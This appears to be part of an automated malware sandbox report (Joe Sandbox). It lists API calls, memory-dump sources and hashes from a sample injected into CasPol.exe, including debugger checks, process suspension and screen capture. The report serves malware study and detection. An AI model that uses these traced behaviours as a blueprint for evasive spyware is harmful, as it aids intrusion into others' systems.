                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4212172061-0
                                                                                                                  • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                  • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                                  • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                  • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                                  APIs
                                                                                                                  • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$FirstH_prologNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 301083792-0
                                                                                                                  • Opcode ID: 0f858e4dd5096bc83d58a7e856ecb51b4ccb7f6bae75c14cf2fecf0dacd635f5
                                                                                                                  • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                                  • Opcode Fuzzy Hash: 0f858e4dd5096bc83d58a7e856ecb51b4ccb7f6bae75c14cf2fecf0dacd635f5
                                                                                                                  • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00448077
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 00448089
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 00448101
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044812E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 806657224-0
                                                                                                                  • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                  • Instruction ID: 7f7bbd1fe339d2c51afc51fb5ca91abc0e6e8a710e1dc4bf18eddf40c0258009
                                                                                                                  • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                  • Instruction Fuzzy Hash: B231BA70904205DFEB159F69CC8287EBBB8FF0576072541AFE054AB2B1DB348D46DB58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2829624132-0
                                                                                                                  • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                  • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                                                                                  • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                  • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0043A765
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0043A76F
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0043A77C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3906539128-0
                                                                                                                  • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                  • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                                                                                  • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                  • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
                                                                                                                  • ExitProcess.KERNEL32 ref: 0044259E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                  • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                                                                                  • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                  • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                  • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                  • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                  • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                  • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACDC
                                                                                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041ACE9
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACF2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseHandleOpenSuspend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1999457699-0
                                                                                                                  • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                  • Instruction ID: 2f9544719979d624048292b5ab27ab43be47c8216fe5e38c5e6db7c07fdef43b
                                                                                                                  • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                  • Instruction Fuzzy Hash: 36D0A733505132638221176A7C0CC87EE6CDFC1EB37024136F805C3220DE30C88186F4
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041AD08
                                                                                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041AD15
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD1E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseHandleOpenResume
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3614150671-0
                                                                                                                  • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                  • Instruction ID: 37c2ac379339410306f7c92c5038f8fbeac8a1766455cc2515cdfea107740f35
                                                                                                                  • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                  • Instruction Fuzzy Hash: 3AD05E32504121638220176A7C0C887EEA9DBC5AB37024236F804C26219A24C841C6A4
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                  • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                  • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                                  • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                  • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1663032902-0
                                                                                                                  • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                  • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                                                                                  • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                  • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00450E7A,00000001), ref: 00450DC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1084509184-0
                                                                                                                  • Opcode ID: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
                                                                                                                  • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                                                                                  • Opcode Fuzzy Hash: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
                                                                                                                  • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2692324296-0
                                                                                                                  • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                  • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                                                                                  • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                  • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • EnumSystemLocalesW.KERNEL32(004510CA,00000001), ref: 00450E39
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1084509184-0
                                                                                                                  • Opcode ID: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
                                                                                                                  • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                                                                                  • Opcode Fuzzy Hash: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
                                                                                                                  • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                                  • EnumSystemLocalesW.KERNEL32(Function_00047078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1272433827-0
                                                                                                                  • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                  • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                                                                                  • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                  • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00450C5E,00000001), ref: 00450D3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1084509184-0
                                                                                                                  • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                  • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                                                                                  • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                  • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                  • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                                                                                                  • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  APIs
                                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                                                                                    • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                                                                                  • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                                                                                  • DeleteDC.GDI32(?), ref: 0041806D
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418070
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041807B
